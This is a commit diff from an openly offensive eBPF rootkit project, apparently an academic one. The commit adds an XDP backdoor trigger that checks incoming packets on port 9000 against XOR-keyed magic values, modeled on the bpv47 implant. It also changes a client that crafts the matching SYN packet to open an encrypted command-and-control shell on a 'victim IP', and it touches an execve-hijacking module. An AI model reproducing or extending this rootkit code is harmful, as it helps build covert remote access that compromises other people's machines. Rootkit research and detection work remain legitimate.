Included new version of custom lib. Added checks for backdoor triggering

src/client/client.c

@@ -12,6 +12,7 @@
 
 #include "../common/constants.h"
 #include "../common/c&c.h"
+#include "../common/protocol.h"
 
 // For printing with colors
 #define KGRN  "\x1B[32m"
@@ -21,12 +22,6 @@
 #define KRED  "\x1B[31m" 
 #define RESET "\x1B[0m"
 
-//For encrypted shell
-#define SYN_PACKET_PAYLOAD_LEN 0x10
-#define SYN_PACKET_KEY_1 "\x56\xA4"
-#define SYN_PACKET_KEY_2 "\x78\x13"
-#define SYN_PACKET_KEY_3 "\x1F\x29"
-#define SYN_PACKET_SECTION_LEN 0x02
 
 void print_welcome_message(){
     printf("*******************************************************\n");
@@ -198,37 +193,38 @@ void activate_command_control_shell_encrypted(char* argv){
     printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
     check_ip_address_format(argv);
     printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
-    char* payload = malloc(SYN_PACKET_PAYLOAD_LEN);
+    //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
+    char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1];
     srand(time(NULL));
-    for(int ii=0; ii<SYN_PACKET_PAYLOAD_LEN; ii++){
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
         payload[ii] = (char)rand();
     }
     //Follow protocol rules
-    char section[SYN_PACKET_SECTION_LEN];
-    char section2[SYN_PACKET_SECTION_LEN];
-    char key1[SYN_PACKET_SECTION_LEN] = SYN_PACKET_KEY_1;
-    char key2[SYN_PACKET_SECTION_LEN] = SYN_PACKET_KEY_2;
-    char key3[SYN_PACKET_SECTION_LEN] = SYN_PACKET_KEY_3;
-    char result[SYN_PACKET_SECTION_LEN];
-    strncpy(section, payload, SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<SYN_PACKET_SECTION_LEN; ii++){
+    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3;
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ key1[ii];
     }
-    strncpy(payload+0x06, result, SYN_PACKET_SECTION_LEN);
+    strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
 
-    strncpy(section, payload+0x02, SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<SYN_PACKET_SECTION_LEN; ii++){
+    strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ key2[ii];
     }
-    strncpy(payload+0x0A, result, SYN_PACKET_SECTION_LEN);
+    strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
 
-    strncpy(section, payload+0x06, SYN_PACKET_SECTION_LEN);
-    strncpy(section2, payload+0x0A, SYN_PACKET_SECTION_LEN);
-    for(int ii=0; ii<SYN_PACKET_SECTION_LEN; ii++){
+    strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ section2[ii] ^ key2[ii];
     }
 
-    strncpy(payload+0x0D, result, SYN_PACKET_SECTION_LEN);
+    strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     
     
     packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
@@ -270,7 +266,6 @@ void activate_command_control_shell_encrypted(char* argv){
         printf("["KGRN"RESPONSE"RESET"] %s\n", res);   
     }
     
-    free(local_ip);
 }
 
 

src/client/lib/RawTCP.h

@@ -3,7 +3,7 @@
 
 #include <stdlib.h>
 
-//Packet_t structure
+//Packet_t and stream_t structures
 typedef struct packet_t{
     struct iphdr *ipheader;
     struct tcphdr *tcpheader;
@@ -12,6 +12,16 @@ typedef struct packet_t{
     char* packet;
 }packet_t;
 
+typedef struct stream_t{
+    packet_t* packet_stream;
+    int stream_length;
+}stream_t;
+
+typedef enum{
+    TYPE_TCP_SEQ_RAW,
+    TYPE_TCP_ACK_RAW
+}stream_inject_type_t;
+
 //PacketForger headers
 packet_t build_standard_packet(
     u_int16_t source_port,
@@ -22,10 +32,24 @@ packet_t build_standard_packet(
     char* payload
     );
 
+stream_t build_standard_packet_stream_empty_payload(
+    int stream_length,
+    u_int16_t source_port,
+    u_int16_t destination_port,
+    const char* source_ip_address,
+    const char* destination_ip_address
+    );
+
+stream_t stream_inject(stream_t stream, stream_inject_type_t type, char* payload, int payload_length);
+
 int packet_destroy(packet_t packet);
 
+void stream_destroy(stream_t stream);
+
 int set_TCP_flags(packet_t packet, int hex_flags);
 
+int set_TCP_seq_num(packet_t packet, u_int32_t bytes);
+
 //SocketManager headers
 int rawsocket_send(packet_t packet);
 

src/common/c&c.h

@@ -7,5 +7,13 @@
 #define CC_PROT_FIN_PART "CC_FIN"
 #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART
 
+//C&C V1 -- bpv47-like trigger
+#define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
+#define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
+#define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
+#define CC_TRIGGER_SYN_PACKET_KEY_3 "\x1F\x29"
+#define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02
+
+
 
 #endif

src/common/constants.h

@@ -20,6 +20,6 @@
 
 //EXECUTION HIJACKING
 #define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
-
+#define EXEC_HIJACK_ACTIVE_TEMP 0
 
 #endif

src/common/protocol.h

@@ -0,0 +1,14 @@
+#ifndef __PROTOCOL_H
+#define __PROTOCOL_H
+
+struct trigger_t {
+    unsigned char xor_key;
+    unsigned int ip;
+    short unsigned int port;
+    unsigned char pad1;
+    short unsigned int pad2;
+    short unsigned int crc;
+};
+
+
+#endif

src/ebpf/include/bpf/exec.h

@@ -86,7 +86,7 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
 
 static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
     //Check if the exec hijacker is active already
-    if(hijacker_state == 1){
+    if(hijacker_state == 1 || EXEC_HIJACK_ACTIVE_TEMP == 0){
         return 0;
     }
     bpf_printk("Starting execve hijacker\n");

src/ebpf/include/xdp/backdoor.h

@@ -0,0 +1,43 @@
+#ifndef __BPF_BACKDOOR
+#define __BPF_BACKDOOR
+
+#include "headervmlinux.h"
+
+#include <bpf/bpf_helpers.h>
+#include "../../common/c&c.h"
+
+static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
+    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN]; 
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+
+    //Undoing the trigger secret packet to check it is the one expected
+
+    //Loading keys
+    __builtin_memcpy(key1, CC_TRIGGER_SYN_PACKET_KEY_1, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(key2, CC_TRIGGER_SYN_PACKET_KEY_2, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+
+    //S1 XOR K1
+    __builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    __builtin_memcpy(section2, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = section[ii] ^ section2[ii];
+        if(result[ii]!=key1[ii]){
+            bpf_printk("FAIL\n");
+        }
+    }
+    bpf_printk("Finished V1 check\n");
+
+    return XDP_PASS;
+
+    
+
+
+
+}
+
+#endif

src/ebpf/include/xdp/xdp_helper.h

@@ -43,8 +43,7 @@ static __always_inline struct expand_return expand_tcp_packet_payload(struct xdp
     __builtin_memcpy(&ip_copy, ip, sizeof(struct iphdr));
     __builtin_memcpy(&tcp_copy, tcp, sizeof(struct tcphdr));
 
-    if (bpf_xdp_adjust_tail(ctx, (int)(sizeof(char)*more_bytes)) != 0)
-    {
+    if (bpf_xdp_adjust_tail(ctx, (int)(sizeof(char)*more_bytes)) != 0){
         //Failed to expand
         bpf_printk("Failed to expand a tcp packet reserved bytes by %i\n", more_bytes);
         ret.code = -1;//The rest is undefined

src/ebpf/kit.bpf.c

@@ -26,12 +26,14 @@
 
 //User-kernel dependencies
 #include "../common/constants.h"
+#include "../common/c&c.h"
 
 //BPF exclusive includes
 #include "packet/packet_manager.h"
 #include "packet/protocol/tcp_helper.h"
 #include "xdp/xdp_helper.h"
 #include "utils/strings.h"
+#include "xdp/backdoor.h"
 
 //BPF modules to load
 #include "include/bpf/sched.h"
@@ -53,8 +55,8 @@ SEC("xdp_prog")
 int xdp_receive(struct xdp_md *ctx){
     //bpf_printk("BPF triggered\n");
     
-    void *data_end = (void *)(long)ctx->data_end;
-    void *data = (void *)(long)ctx->data;
+    void *data_end = (void *)(__u32)ctx->data_end;
+    void *data = (void *)(__u32)ctx->data;
 
     unsigned int payload_size;
     struct ethhdr *eth = data;
@@ -88,18 +90,29 @@ int xdp_receive(struct xdp_md *ctx){
 
     if (get_tcp_dest_port(tcp) != SECRET_PACKET_DEST_PORT){
         bpf_printk("E %i\n", bpf_ntohs(tcp->dest));
+        bpf_printk("D: %ld, DE:%ld", ctx->data, ctx->data_end);
         return XDP_PASS;
     }
+    bpf_printk("Detected 9000\n");
 
     payload_size = bpf_ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4);
     payload = (void *)tcp + tcp->doff*4;
 
-    // We use "size - 1" to account for the final '\0', but depending on the program use
-    if (payload_size != sizeof(SECRET_PACKET_PAYLOAD)-1) {
+    //Check for the rootkit backdoor trigger V1
+    if(payload_size == CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE){
+        if (tcp_payload_bound_check(payload, payload_size, data_end)){
+            bpf_printk("G");
+            return XDP_PASS;
+        }
+        return manage_backdoor_trigger_v1(payload, payload_size);
+    }
+    //Check for the packet modification PoC
+    // We use "size - 1" to account for the final '\0'
+    else if (payload_size != sizeof(SECRET_PACKET_PAYLOAD)-1) {
         bpf_printk("F, PS:%i, P:%i, DE:%i\n", payload_size, payload, data_end);
         return XDP_PASS;
     }
-
+    
     if (tcp_payload_bound_check(payload, payload_size, data_end)){
         bpf_printk("G");
         return XDP_PASS;

src/helpers/lib/RawTCP.h

@@ -3,7 +3,7 @@
 
 #include <stdlib.h>
 
-//Packet_t structure
+//Packet_t and stream_t structures
 typedef struct packet_t{
     struct iphdr *ipheader;
     struct tcphdr *tcpheader;
@@ -12,6 +12,16 @@ typedef struct packet_t{
     char* packet;
 }packet_t;
 
+typedef struct stream_t{
+    packet_t* packet_stream;
+    int stream_length;
+}stream_t;
+
+typedef enum{
+    TYPE_TCP_SEQ_RAW,
+    TYPE_TCP_ACK_RAW
+}stream_inject_type_t;
+
 //PacketForger headers
 packet_t build_standard_packet(
     u_int16_t source_port,
@@ -22,10 +32,24 @@ packet_t build_standard_packet(
     char* payload
     );
 
+stream_t build_standard_packet_stream_empty_payload(
+    int stream_length,
+    u_int16_t source_port,
+    u_int16_t destination_port,
+    const char* source_ip_address,
+    const char* destination_ip_address
+    );
+
+stream_t stream_inject(stream_t stream, stream_inject_type_t type, char* payload, int payload_length);
+
 int packet_destroy(packet_t packet);
 
+void stream_destroy(stream_t stream);
+
 int set_TCP_flags(packet_t packet, int hex_flags);
 
+int set_TCP_seq_num(packet_t packet, u_int32_t bytes);
+
 //SocketManager headers
 int rawsocket_send(packet_t packet);